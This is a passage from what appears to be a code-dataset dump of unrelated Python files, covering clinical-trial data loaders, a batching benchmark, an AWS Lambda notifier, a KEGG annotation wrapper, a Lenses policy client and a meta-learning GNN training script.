id_col='STUDYID',
location=full_location)
outcomes['event'] = 1-(outcomes['event']-1)
if 'ESTROGEN' in features.columns:
assert 'SEX' in features.columns, "`SEX` needs to be included if using `ESTROGEN`"
features['ESTROGEN'][ features['SEX'] == 1.0] = 4.0
features['ESTROGEN'][features['ESTROGEN'].isna()] = 3.0
return outcomes, features
def load_proud(endpoint=None, features=None, location=''):
raise NotImplementedError()
if features is None:
print("No Features Specified!! using default baseline features.")
categorical_features = ['RZGROUP', 'RACE', 'HISPANIC', 'ETHNIC',
'SEX', 'ESTROGEN', 'BLMEDS', 'MISTROKE',
'HXCABG', 'STDEPR', 'OASCVD', 'DIABETES',
'HDLLT35', 'LVHECG', 'WALL25', 'LCHD',
'CURSMOKE', 'ASPIRIN', 'LLT', 'RACE2',
'BLMEDS2', 'GEOREGN']
numeric_features = ['AGE', 'BLWGT', 'BLHGT', 'BLBMI', 'BV2SBP',
'BV2DBP', 'EDUCAT', 'APOTAS', 'BLGFR']
features = {'hyp_vsc.sas7bdat': categorical_features + numeric_features}
if endpoint is None:
print("No Endpoint specified, using all-cause death as the study endpoint.")
endpoint = 'DEATH'
# Set the outcome variable
event = endpoint
if 'CANCER' in endpoint:
time = 'DYCANC'
else:
time = 'DY' + event
full_location = location+'ALLHAT/ALLHAT_v2016a/DATA/Summary/'
outcomes, features = _load_generic_biolincc_dataset(outcome_tbl='hyp_vsc.sas7bdat',
time_col=time,
event_col=event,
features=features,
id_col='STUDYID',
location=full_location)
return outcomes, features
def load_aimhigh():
raise NotImplementedError()
def load_amis():
raise NotImplementedError()
def load_bari():
raise NotImplementedError()
def load_best():
raise NotImplementedError()
def load_clever():
raise NotImplementedError()
def load_oat():
raise NotImplementedError()
def load_peace():
raise NotImplementedError()
def load_sprint_pop():
raise NotImplementedError()
def load_stich():
raise NotImplementedError()
def load_accord(endpoint=None, features=None, location=''):
# Default Baseline Features to include:
if features is None:
print("No Features Specified!! using default baseline features.")
features = {
'ACCORD/3-Data Sets - Analysis/3a-Analysis Data Sets/accord_key.sas7bdat': ['female', 'baseline_age', 'arm',
'cvd_hx_baseline', 'raceclass',
'treatment'],
'ACCORD/3-Data Sets - Analysis/3a-Analysis Data Sets/bloodpressure.sas7bdat': ['sbp', 'dbp', 'hr'],
'ACCORD/4-Data Sets - CRFs/4a-CRF Data Sets/f01_inclusionexclusionsummary.sas7bdat': ['x1diab', 'x2mi',
'x2stroke', 'x2angina','cabg','ptci','cvdhist','orevasc','x2hbac11','x2hbac9','x3malb','x3lvh','x3sten','x4llmeds',
'x4gender','x4hdlf', 'x4hdlm','x4bpmeds','x4notmed','x4smoke','x4bmi'],
'ACCORD/3-Data Sets - Analysis/3a-Analysis Data Sets/lipids.sas7bdat': ['chol', 'trig', 'vldl', 'ldl', 'hdl'],
'ACCORD/3-Data Sets - Analysis/3a-Analysis Data Sets/otherlabs.sas7bdat': ['fpg', 'alt', 'cpk',
'potassium', 'screat', 'gfr',
'ualb', 'ucreat', 'uacr'],
}
# outcomes = {'ACCORD_Private/Data Sets - Analysis 201604/CVDOutcomes_201604.sas7bdat':['censor_po','type_po',
# 'fuyrs_po', 'fuyrs_po7p', 'censor_tm', 'type_tm',
# 'fuyrs_tm', 'fuyrs_tm7p', 'censor_cm', 'type_nmi', 'fuyrs_nmi7p', 'censor_nst',
# 'type_nst', 'fuyrs_nst', 'fuyrs_nst7p', 'censor_tst', 'fuyrs_tst', 'fuyrs_tst7p'
# 'censor_chf', 'fuyrs_chf', 'censor_ex', 'type_ex', 'fuyrs_ex', 'fuyrs_ex7p',
# 'censor_maj', 'type_maj', 'fuyrs_maj7p']
# }
if endpoint is None:
print("No Endpoint specified, using primary study endpoint.")
endpoint = 'po'
# Set the outcome variable,
event = 'censor_'+endpoint
time = 'fuyrs_'+endpoint
outcome_tbl = 'ACCORD/3-Data Sets - Analysis/3a-Analysis Data Sets/cvdoutcomes.sas7bdat'
outcomes, features = _load_generic_biolincc_dataset(outcome_tbl=outcome_tbl,
time_col=time,
event_col=event,
features=features,
id_col='MaskID',
location=location,
visit_col='Visit',
baseline_visit=(b'BLR', b'S01'))
outcomes['event'] = 1-outcomes['event']
outcomes['time'] = outcomes['time']
outcomes = outcomes.loc[outcomes['time']>1.0]
features = features.loc[outcomes.index]
outcomes['time'] = outcomes['time']-1
return outcomes, features
| 2.921875 | 3 |
batching_benchmark.py | rdhara/modulo | 8 | 12789344 | <reponame>rdhara/modulo
import time
import random
import pandas
import seaborn as sns
import numpy as np
from matplotlib import pyplot as plt
class Module():
def __init__(self, proc_time=None):
self.proc_time = proc_time
def run(self):
time.sleep(self.proc_time)
class ModuleA(Module):
def __init__(self, proc_time=1e-4):
super(ModuleA, self).__init__(proc_time)
class ModuleB(Module):
def __init__(self, proc_time=2e-4):
super(ModuleB, self).__init__(proc_time)
class ModuleC(Module):
def __init__(self, proc_time=3e-4):
super(ModuleC, self).__init__(proc_time)
class ModuleD(Module):
def __init__(self, proc_time=4e-4):
super(ModuleD, self).__init__(proc_time)
class ModuleE(Module):
def __init__(self, proc_time=5e-4):
super(ModuleE, self).__init__(proc_time)
def generate_task(N, sigma, k=64, max_l=5, mode='homogeneous'):
T = []
if mode == 'homogeneous':
assert(N % k == 0), 'N must be a multiple of batch size'
for _ in range(N // k):
layout = [' '.join(random.choice(sigma) for _ in range(random.randrange(2, max_l)))]
T.extend(layout*k)
elif mode == 'heterogeneous':
for _ in range(N):
T.append(' '.join(random.choice(sigma) for _ in range(random.randrange(2, max_l))))
else:
raise ValueError('Invalid mode {}'.format(mode))
return T
class HomogeneousBatching():
def __init__(self, T, M, k, batch_cost=0.0005):
self.T = T
self.M = M
self.k = k
self.batch_cost = batch_cost
def train(self):
t0 = time.time()
N = len(self.T)
for b in range(N // self.k):
layout = list(map(lambda x: self.M[x], self.T[b].split()))
for mod in layout:
mod.run()
time.sleep(self.batch_cost)
dt = time.time() - t0
print('ELAPSED TIME: {:.2f} s'.format(dt))
return dt
class NoBatching():
def __init__(self, T, M):
self.T = T
self.M = M
def train(self):
t0 = time.time()
flat_T = [item for sublist in self.T for item in sublist]
for layout in flat_T:
for mod in layout.split():
self.M[mod].run()
dt = time.time() - t0
print('ELAPSED TIME: {:.2f} s'.format(dt))
return dt
class HeterogeneousBatching():
def __init__(self, T, M, k, batch_cost=5e-4):
self.T = [t.split() for t in T]
self.M = M
self.k = k
self.batch_cost = batch_cost
def train(self):
t0 = time.time()
N = len(self.T)
H = {(-1, j) for j in range(N)}
T_done = set()
T_prog = [0 for _ in range(N)]
while len(T_done) < N:
P = {m: [] for m in self.M.keys()}
P_full = {m: False for m in self.M.keys()}
while_ctr = 0
while not sum(P_full.values()) and while_ctr < 1:
while_ctr = 0
for t in range(len(self.T)):
if t not in T_done and (T_prog[t] - 1, t) in H:
mod = self.T[t][T_prog[t]]
curr_queue = len(P[mod])
if curr_queue < self.k:
while_ctr -= 1
P[mod].append(self.M[mod])
H.remove((T_prog[t] - 1, t))
T_prog[t] += 1
H.add((T_prog[t] - 1, t))
if T_prog[t] == len(self.T[t]):
T_done.add(t)
if curr_queue + 1 == self.k:
P_full[mod] = True
while_ctr += 1
for m in P.keys():
self.M[m].run()
time.sleep(self.batch_cost)
dt = time.time() - t0
print('ELAPSED TIME: {:.2f} s'.format(dt))
return dt
M = {
'a': ModuleA(),
'b': ModuleB(),
'c': ModuleC(),
'd': ModuleD(),
'e': ModuleE()
}
res = []
ns = [256, 1024, 4096, 16384, 65536, 262144]
ks = [16, 32, 64, 128]
ls = [5, 10, 15, 20]
for n in ns:
for k in ks:
for l in ls:
dataset = generate_task(n, 'abcde', k, l, mode='heterogeneous')
htb = HeterogeneousBatching(dataset, M, k)
nb = NoBatching(dataset, M)
res.append({
'n': n,
'k': k,
'l': l,
'htb_time': htb.train(),
'nb_time': nb.train()
})
df = pandas.DataFrame(res)
# df = pandas.read_csv('../batching.csv')
df['log_htb_time'] = np.log10(df['htb_time'])
df['log_nb_time'] = np.log10(df['nb_time'])
df['log_n'] = np.log10(df['n'])
sns.set_style('whitegrid')
sns.set_context('paper', rc={'axes.titlesize':22, 'legend.fontsize':'xx-large', 'axes.labelsize': 16})
sns.set_palette('muted', color_codes=True)
f, ((ax1, ax2),(ax3, ax4)) = plt.subplots(2, 2, figsize=(20,16))
plt.suptitle('Experiment Set 1: Fixing k = 64', fontsize=26)
plt.subplots_adjust(hspace=0.25)
axmap = {1: ax1, 2: ax2, 3: ax3, 4: ax4}
for i in range(1, 5):
ax = axmap[i]
ax.set_title('Maximum layout length $\ell_{max} = $' + str(ls[i-1]))
df_sub = df[(df['k'] == 64) & (df['l'] == ls[i-1])]
ax.plot(df_sub['log_n'], df_sub['log_htb_time'], c='r', marker='o', label='HTB')
ax.plot(df_sub['log_n'], df_sub['log_nb_time'], c='b', marker='o', label='NB')
ax.set_xlabel('Log training size (log N)')
ax.set_ylabel('Log time (s)')
ax.tick_params(labelsize=14)
ax.spines['left'].set_color('k')
ax.spines['bottom'].set_color('k')
f.legend(loc=7)
sns.despine()
f.savefig('../Figures/kfixed.pdf', dpi=200)
f, ((ax1, ax2),(ax3, ax4)) = plt.subplots(2, 2, figsize=(20,16))
plt.suptitle('Experiment Set 2: Fixing N = 65536', fontsize=26)
plt.subplots_adjust(hspace=0.25)
axmap = {1: ax1, 2: ax2, 3: ax3, 4: ax4}
for i in range(1, 5):
ax = axmap[i]
ax.set_title('Batch size k = {}'.format(ks[i-1]))
df_sub = df[(df['n'] == 65536) & (df['k'] == ks[i-1])]
ax.plot(df_sub['l'], df_sub['log_htb_time'], c='r', marker='o', label='HTB')
ax.plot(df_sub['l'], df_sub['log_nb_time'], c='b', marker='o', label='NB')
ax.set_xlabel('Max layout length ($\ell_{max}$)')
ax.set_ylabel('Log time (s)')
ax.tick_params(labelsize=14)
ax.spines['left'].set_color('k')
ax.spines['bottom'].set_color('k')
f.legend(loc=7)
sns.despine()
f.savefig('../Figures/Nfixed.pdf', dpi=200)
f, ((ax1, ax2),(ax3, ax4)) = plt.subplots(2, 2, figsize=(20,16))
plt.suptitle('Experiment Set 3: Fixing $\ell_{max}$ = 15', fontsize=26)
plt.subplots_adjust(hspace=0.25)
axmap = {1: ax1, 2: ax2, 3: ax3, 4: ax4}
for i in range(1, 5):
ax = axmap[i]
ax.set_title('Training examples N = {}'.format(ns[i+1]))
df_sub = df[(df['l'] == 10) & (df['n'] == ns[i+1])]
ax.plot(df_sub['k'], df_sub['log_htb_time'], color='r', marker='o', label='HTB')
ax.plot(df_sub['k'], df_sub['log_nb_time'], color='b', marker='o', label='NB')
ax.set_xlabel('Batch size (k)')
ax.set_ylabel('Log time (s)')
ax.tick_params(labelsize=14)
ax.spines['left'].set_color('k')
ax.spines['bottom'].set_color('k')
f.legend(loc=7)
sns.despine()
f.savefig('../Figures/ellfixed.pdf', dpi=200) | 2.234375 | 2 |
stacks/vmdkexport/resources/vmexport/vmdknotify/vmdknotify_function.py | aws-samples/ec2-imagebuilder-vmdk-export | 0 | 12789345 | ##################################################
## Notify VMDK export request
##################################################
import os
import boto3
from botocore.exceptions import ClientError
import json
import logging
def lambda_handler(event, context):
# set logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# print the event details
logger.debug(json.dumps(event, indent=2))
# get state machine arn from env vars
state_machine_arn = os.environ['STATE_MACHINE_ARN']
image_build_version_arn = event["Records"][0]["Sns"]["Message"]
stepfunctions_client = boto3.client('stepfunctions')
response = stepfunctions_client.list_executions(
stateMachineArn=state_machine_arn,
statusFilter='RUNNING',
maxResults=1000
)
if len(response['executions']) > 0:
return image_build_version_arn
response = stepfunctions_client.start_execution(
stateMachineArn=state_machine_arn,
input="{\"image_build_version_arn\" : \"" + image_build_version_arn + "\"}"
)
return image_build_version_arn | 1.898438 | 2 |
analysis_script/make_time_chart.py | nahimilega/subreddit-analyzer | 1 | 12789346 | <reponame>nahimilega/subreddit-analyzer<filename>analysis_script/make_time_chart.py
import datetime
import random
import matplotlib.pyplot as plt
import pymongo
from datetime import datetime
from collections import Counter
# Make chart of busy hours
# All charts in graph folder
def intilise_database():
"""
Initilse the database and make a table instance
Returns
pymongo object of the table
"""
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
mydb=myclient['subreddit']
maintable = mydb["posts2"]
return maintable
db = intilise_database()
# make up some data
ll = []
for post in db.find():
timestamp = post['time']
dt = datetime.fromtimestamp(timestamp)
ll.append(dt.hour)
cc = Counter(ll)
x = []
y = []
for i in range(24):
x.append(str(i)+":00" )
y.append(cc[i])
plt.xlabel('Time (Hours) in UTC')
plt.ylabel('No of posts')
plt.plot(x,y)
# beautify the x-labels
plt.gcf().autofmt_xdate()
plt.show() | 3.140625 | 3 |
jakomics/kegg.py | jeffkimbrel/jakomics | 0 | 12789347 | <gh_stars>0
import uuid
import os
import subprocess
import re
import pandas as pd
from jakomics import colors
from jakomics.utilities import system_call
class KOFAM:
def __init__(self, line, t_scale=1.0):
parsed = re.split('\t', line)
self.parsed = parsed
self.gene = parsed[1]
self.KO = parsed[2]
self.threshold = parsed[3]
self.score = float(parsed[4])
self.evalue = float(parsed[5])
self.description = parsed[6]
if len(self.threshold) == 0:
self.threshold = 0
self.warning = f"WARNING: {self.KO} does not have a KO threshold. All hits >0 will be included."
if self.score >= float(self.threshold) * float(t_scale):
self.threshold = float(self.threshold)
self.passed = True
else:
self.passed = False
def view(self):
return [self.gene, self.KO, self.threshold, self.score, self.evalue, self.description]
def result(self):
return {'gene': self.gene,
'annotation': self.KO,
'score': self.score,
'evalue': self.evalue}
def __str__(self):
return "<JAKomics KOFAM class>"
def run_kofam(faa_path, hal_path, ko_list, cpus=1, t_scale=1, echo=False, run=True):
temp_dir = 'KO_' + uuid.uuid4().hex
command = f'exec_annotation --no-report-unannotated -k {ko_list} --tmp-dir {temp_dir} {faa_path} -T {t_scale} --cpu {int(cpus)} --profile {hal_path} -f detail-tsv ; rm -fR {temp_dir}'
kofam_out = system_call(command, return_type="out", echo=echo, run=run)
hits = []
for line in kofam_out:
if len(line) > 0 and not line.lstrip().startswith('#'):
hits.append(KOFAM(line, t_scale))
return hits
def parse_kofam_hits(run_kofam_out):
'''
Returns a dictionary of passed results with KO as key and list of kofam classes as value
'''
parsed = {}
for hit in run_kofam_out:
if hit.passed:
# print(db['DB_NAME'], genome.short_name, hit.view(), sep="\t")
if hit.KO in parsed:
parsed[hit.KO].append(hit)
else:
parsed[hit.KO] = [hit]
return parsed
def kofam_to_df(run_kofam_out):
results = pd.DataFrame(columns=['LOCUS_TAG', 'KO', 'SCORE', 'THRESHOLD', 'EVALUE',
'DESCRIPTION'])
for hit in run_kofam_out:
if hit.passed:
results = results.append(
pd.Series(data={'LOCUS_TAG': hit.gene,
'KO': hit.KO,
'SCORE': hit.score,
'THRESHOLD': hit.threshold,
'EVALUE': hit.evalue,
'DESCRIPTION': hit.description
}
),
ignore_index=True)
return results
| 2.3125 | 2 |
lensesio/data/policy.py | rsaggino/lenses-python | 13 | 12789348 | from lensesio.core.endpoints import getEndpoints
from lensesio.core.exec_action import exec_request
class Policy:
def __init__(self, verify_cert=True):
getEndpoints.__init__(self, "policyEndpoints")
self.verify_cert=verify_cert
self.lenses_policies_endpoint = self.url + self.lensesPoliciesEndpoint
self.policy_headers = {
'Content-Type': 'application/json',
'Accept': 'text/plain application/json',
'x-kafka-lenses-token': self.token}
def ViewPolicy(self):
self.viewPolicy = exec_request(
__METHOD="get",
__EXPECTED="json",
__URL=self.lenses_policies_endpoint,
__HEADERS=self.policy_headers,
__VERIFY=self.verify_cert
)
return self.viewPolicy
def SetPolicy(self, name, obfuscation, impactType, category, fields):
if type(fields) is not list:
fields = [fields]
params = dict(
name=name,
obfuscation=obfuscation,
impactType=impactType,
category=category,
fields=fields
)
self.setPolicy = exec_request(
__METHOD="post",
__EXPECTED="text",
__URL=self.lenses_policies_endpoint,
__HEADERS=self.policy_headers,
__DATA=params,
__VERIFY=self.verify_cert
)
return self.setPolicy
def DelPolicy(self, name):
policies = self.ViewPolicy()
for e in policies:
if e['name'] == name:
policy_id = e['id']
break
else:
policy_id = None
if policy_id:
_REQ = self.lenses_policies_endpoint + '/' + policy_id
self.delPolicy = exec_request(
__METHOD="delete",
__EXPECTED="text",
__URL=_REQ,
__HEADERS=self.policy_headers,
__VERIFY=self.verify_cert
)
else:
return "No policy with name %s" % name
return self.delPolicy
| 2.140625 | 2 |
modelling/train_scripts/train_meta.py | TheisFerre/Thesis-paper | 0 | 12789349 | <reponame>TheisFerre/Thesis-paper
from modelling.models import BaselineGATLSTM, Edgeconvmodel, GATLSTM, Encoder, Decoder, STGNNModel, BaselineGNNLSTM
import torch
import torch.optim as optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
import numpy as np
import dill
from data_processing.process_dataset import Dataset
from torch_geometric.loader import DataLoader
import argparse
import datetime
import logging
import os
import json
from distutils.dir_util import copy_tree
import learn2learn as l2l
import random
from torch.utils.tensorboard import SummaryWriter
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def convert_to_dataloader(data, k_shots=6):
data_list = []
for i in range(len(data)):
data_list.append(data[i])
loader = DataLoader(data_list, batch_size=k_shots, shuffle=True)
return loader
def train_model(
train_datasets: dict,
test_datasets: dict,
epochs: int = 200,
adapt_lr: float = 0.001,
batch_task_size: int = -1,
meta_lr: float = 0.001,
adaptation_steps: int = 5,
weather_features: int = 4,
time_features: int = 43,
log_dir: str = None,
dropout: float = 0.2,
hidden_size: int = 32,
node_out_features: int = 10,
gpu: bool = False
):
GAT_model = GATLSTM(
node_in_features=1,
weather_features=weather_features,
time_features=time_features,
node_out_features=10,
gpu=gpu,
hidden_size=hidden_size,
dropout_p=0.3
)
model = Edgeconvmodel(
node_in_features=1,
weather_features=weather_features,
time_features=time_features,
node_out_features=node_out_features,
gpu=gpu,
hidden_size=hidden_size,
dropout_p=dropout
)
model_vanilla = Edgeconvmodel(
node_in_features=1,
weather_features=weather_features,
time_features=time_features,
node_out_features=node_out_features,
gpu=gpu,
hidden_size=hidden_size,
dropout_p=dropout
)
model_vanilla.to(DEVICE)
opt_finetune = optim.RMSprop(model_vanilla.parameters(), 0.001) #arbitrarily set lr
model.to(DEVICE)
GAT_model.to(DEVICE)
maml = l2l.algorithms.MAML(model, lr=adapt_lr, first_order=True)
maml_gat = l2l.algorithms.MAML(GAT_model, lr=adapt_lr, first_order=True)
opt_gat = optim.Adam(maml_gat.parameters(), meta_lr)
opt = optim.Adam(maml.parameters(), meta_lr)
lossfn = torch.nn.MSELoss(reduction='mean')
if batch_task_size == -1 or batch_task_size > len(train_datasets.keys()):
batch_task_size = len(train_datasets.keys())
writer = SummaryWriter(log_dir=log_dir)
step_dict = {f_name: 0 for f_name in train_datasets.keys()}
for epoch in range(epochs):
opt.zero_grad()
opt_gat.zero_grad()
query_loss_vanilla = 0
meta_train_loss = 0.0
meta_train_loss_gat = 0.0
# num_evals = 0
for f_name, task in random.sample(train_datasets.items(), batch_task_size):
learner = maml.clone()
learner_gat = maml_gat.clone()
support_data = next(iter(task)).to(DEVICE)
query_data = next(iter(task)).to(DEVICE)
for _ in range(adaptation_steps): # adaptation_steps
support_preds = learner(support_data)
support_loss = lossfn(support_data.y, support_preds.view(support_data.num_graphs, -1))
learner.adapt(support_loss)
support_preds_gat = learner_gat(support_data)
support_loss_gat = lossfn(support_data.y, support_preds_gat.view(support_data.num_graphs, -1))
learner_gat.adapt(support_loss_gat)
opt_finetune.zero_grad(set_to_none=True)
out = model_vanilla(support_data)
loss = lossfn(support_data.y, out.view(support_data.num_graphs, -1))
loss.backward()
opt_finetune.step()
query_preds = learner(query_data)
query_loss = lossfn(query_data.y, query_preds.view(query_data.num_graphs, -1))
writer.add_scalar(tag=f"{f_name}/query_loss", scalar_value=query_loss.item(), global_step=step_dict[f_name])
step_dict[f_name] += 1
query_preds_gat = learner_gat(query_data)
query_loss_gat = lossfn(query_data.y, query_preds_gat.view(query_data.num_graphs, -1))
writer.add_scalar(tag=f"{f_name}/gat_query_loss", scalar_value=query_loss_gat.item(), global_step=step_dict[f_name])
step_dict[f_name] += 1
with torch.no_grad():
out = model_vanilla(query_data)
loss = lossfn(query_data.y, out.view(query_data.num_graphs, -1))
query_loss_vanilla += loss
meta_train_loss += query_loss
meta_train_loss_gat += query_loss_gat
query_loss_vanilla = query_loss_vanilla / batch_task_size
meta_train_loss = meta_train_loss / batch_task_size
meta_train_loss_gat = meta_train_loss_gat / batch_task_size
if epoch % 1 == 0:
logger.info(f"Epoch: {epoch+1}")
logger.info(f"Meta Train Loss: {meta_train_loss.item()}")
logger.info(f"(gat) Meta Train Loss: {meta_train_loss_gat.item()}")
logger.info(8 * "#")
writer.add_scalar(tag=f"Meta/loss", scalar_value=meta_train_loss.item(), global_step=epoch)
writer.add_scalar(tag=f"Meta/gat_loss", scalar_value=meta_train_loss_gat.item(), global_step=epoch)
#writer.add_scalar(tag=f"vanilla/loss", scalar_value=query_loss_vanilla.item(), global_step=epoch)
meta_train_loss.backward()
meta_train_loss_gat.backward()
torch.nn.utils.clip_grad_norm_(maml.parameters(), 1)
torch.nn.utils.clip_grad_norm_(maml_gat.parameters(), 1)
opt.step()
opt_gat.step()
return model, model_vanilla, GAT_model
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(description="Model training argument parser")
parser.add_argument("-d", "--data_dir", type=str, help="Directory of datasets")
parser.add_argument("-t", "--train_size", type=float, default=0.8, help="Ratio of data to be used for training")
parser.add_argument("-b", "--batch_task_size", type=int, default=-1, help="number of tasks to sample")
parser.add_argument("-k", "--k_shot", type=int, default=5, help="shots to be used")
parser.add_argument("-a", "--adaptation_steps", type=int, default=5, help="Number of adaptation steps")
parser.add_argument("-e", "--epochs", type=int, default=200, help="number of epochs")
parser.add_argument("-alr", "--adapt_lr", type=float, default=0.001, help="Adaptation learning rate")
parser.add_argument("-mlr", "--meta_lr", type=float, default=0.001, help="Meta learning rate")
parser.add_argument("-ld", "--log_dir", type=str, default=None, help="directory to log stuff")
parser.add_argument("-ex", "--exclude", type=str, default="", help="comma seperated list of datasets to exclude")
parser.add_argument("-hs", "--hidden_size", type=int, default=32)
parser.add_argument("-dp", "--dropout_p", type=float, default=0.2)
parser.add_argument("-no", "--node_out_features", type=int, default=10)
parser.add_argument("-g", "--gpu", action='store_true')
args = parser.parse_args()
train_dataloader_dict = {}
test_dataloader_dict = {}
exclude_list = args.exclude.split(",")
for f in os.listdir(args.data_dir):
abs_path = os.path.join(args.data_dir, f)
CONTINUE_FLAG=False
for exclude_file in exclude_list:
if f.startswith(exclude_file) and len(exclude_file) > 0:
CONTINUE_FLAG = True
if CONTINUE_FLAG:
continue
with open(abs_path, "rb") as infile:
logger.info(abs_path)
data = dill.load(infile)
train_data, test_data = Dataset.train_test_split(data, num_history=12, shuffle=True, ratio=args.train_size)
train_data_dataloader = convert_to_dataloader(train_data, k_shots=args.k_shot)
test_data_dataloader = convert_to_dataloader(test_data, k_shots=args.k_shot)
f_name = f.split("/")[-1].replace(".pkl", "")
train_dataloader_dict[f_name] = train_data_dataloader
test_dataloader_dict[f_name] = test_data_dataloader
logger.info(str(train_dataloader_dict))
WEATHER_FEATURES = train_data.weather_information.shape[-1]
TIME_FEATURES = train_data.time_encoding.shape[-1]
start_time = datetime.datetime.now()
logger.info(f"Fitting model at time: {str(start_time)}")
if args.log_dir is not None:
log_dir = f"{args.log_dir}/{start_time.isoformat()}"
else:
log_dir = None
model, vanilla_model, gat_model = train_model(
train_datasets=train_dataloader_dict,
test_datasets=test_dataloader_dict,
adaptation_steps=args.adaptation_steps,
batch_task_size=args.batch_task_size,
epochs=args.epochs,
adapt_lr=args.adapt_lr,
meta_lr=args.meta_lr,
weather_features=WEATHER_FEATURES,
time_features=TIME_FEATURES,
hidden_size=args.hidden_size,
dropout=args.dropout_p,
node_out_features=args.node_out_features,
log_dir=log_dir,
gpu=args.gpu
)
model.to("cpu")
torch.save(model.state_dict(), f"{log_dir}/model.pth")
vanilla_model.to("cpu")
torch.save(vanilla_model.state_dict(), f"{log_dir}/vanilla_model.pth")
gat_model.to("cpu")
torch.save(gat_model.state_dict(), f"{log_dir}/gat_model.pth")
args_dict = vars(args)
with open(f"{log_dir}/settings.json", "w") as outfile:
json.dump(args_dict, outfile)
"""end_time = datetime.datetime.now()
end_time_str = end_time.strftime("%Y-%m-%d %H:%M:%S")
td = end_time - start_time
minutes = round(td.total_seconds() / 60, 2)
totsec = td.total_seconds()
h = int(totsec // 3600)
m = int((totsec % 3600) // 60)
sec = int((totsec % 3600) % 60)
logger.info(f"Total training time: {h}:{m}:{sec}")
logger.info(f"Average Epoch time: {round(minutes/args.epochs, 2)} minutes")
cur_dir = os.getcwd()
while True:
split_dir = cur_dir.split("/")
if "Thesis" not in split_dir:
break
else:
if split_dir[-1] == "Thesis":
break
else:
os.chdir("..")
cur_dir = os.getcwd()
os.chdir("models")
cur_dir = os.getcwd()
logger.info(f"Saving files to {cur_dir}/{args.model}_{end_time_str}")
os.mkdir(f"{args.model}_{end_time_str}")
args_dict = vars(args)
with open(f"{args.model}_{end_time_str}/settings.json", "w") as outfile:
json.dump(args_dict, outfile)
losses_dict = {"train_loss": train_loss, "test_loss": test_loss}
outfile = open(f"{args.model}_{end_time_str}/losses.pkl", "wb")
dill.dump(losses_dict, outfile)
outfile.close()
model.to("cpu")
torch.save(model.state_dict(), f"{args.model}_{end_time_str}/model.pth")
logger.info("Files saved successfully")
os.chdir(f"{args.model}_{end_time_str}")
os.mkdir(f"logs")
target_dir = "logs"
source_dir = f"{os.getenv('HOME')}/.lsbatch"
copy_tree(source_dir, target_dir)
for f in os.listdir(target_dir):
if not f.endswith("err") and not f.endswith("out"):
os.remove(f"{target_dir}/{f}")"""
| 2.34375 | 2 |
cirosantilli/utils.py | cirosantilli/python-utils | 1 | 12789350 | #!/usr/bin/env python
import re
import os.path
STDERR_SEPARATOR0 = '=' * 60
def iterify(iterable):
if isinstance(iterable, basestring):
iterable = [iterable]
try:
iter(iterable)
except TypeError:
iterable = [iterable]
return iterable
def resub(resubpair,target):
"""takes a regex find replace pair (find, replace) and applies it to a target
:param resubpair: find re and substitute string
:type resubpair: a pair: (re.compile object, string)
:param target: what to operate on
:type name: string
"""
return resubpair[0].sub(resubpair[1],target)
def resubs(resubpairs,target):
"""takes several regex find replace pairs [(find1, replace1), (find2,replace2), ... ]
and applies them to a target on the order given"""
return resubpair[0].sub(resubpair[1],target)
for resubpair in resubpairs:
target = resub(resubpair,target)
return target
whitespaces_to_single_space_resub = [re.compile(r"\s+")," "]
def whitespaces_to_single_space(s):
return resub(whitespaces_to_single_space_resub,s)
remove_heading_whitespace_resub = [re.compile(r"^\s+"),""]
def remove_heading_whitespace(s):
return resub(whitespaces_to_single_space_resub,s)
remove_trailling_whitespace_resub = [re.compile(r"\s+$"),""]
def remove_trailling_whitespace(s):
return resub(remove_trailling_whitespace_resub,s)
CONTROL_CHARS_STR = u''.join(map(unichr, range(0,32) + range(127,160)))
CONTROL_CHAR_RE = re.compile('[%s]' % re.escape(CONTROL_CHARS_STR), re.UNICODE)
def strip_control_chars(s):
return CONTROL_CHAR_RE.sub(ur"", s)
if __name__ == '__main__':
print 'TEST'
#FORBIDDEN_PRINTABLE_BASENAME_CHARS_STR = '|\\?*<":>+[]/'
MAX_BNAME_LENGTH = 255
FORBIDDEN_PRINTABLE_BASENAME_CHARS_STR = ur"/:\\|*<>\""
FORBIDDEN_BASENAME_CHARS = CONTROL_CHARS_STR + FORBIDDEN_PRINTABLE_BASENAME_CHARS_STR
FORBIDDEN_BASENAME_CHARS_RE = re.compile(ur"[%s]" % re.escape(FORBIDDEN_BASENAME_CHARS), re.UNICODE)
| 3 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.